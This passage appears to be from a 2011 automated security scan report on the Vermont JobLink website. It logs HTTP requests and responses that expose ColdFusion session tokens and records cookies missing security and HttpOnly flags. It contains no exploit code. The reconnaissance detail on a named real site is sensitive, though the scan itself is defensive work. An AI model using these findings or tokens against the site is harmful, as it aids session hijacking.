PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/contactus.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/employeroverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/joboverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/jobsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/linkview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) server-error: true Content-Type: text/html; charset=UTF-8 Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/resourcesoverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:07:34 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada/404/404_qry.cfm Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
4. Cookie without HttpOnly flag set
There are 29 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/ HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:06:48 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Set-Cookie: TEST=1;path=/ Set-Cookie: SYSTRANLANGUAGE=en;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/404/404_qry.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:01 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
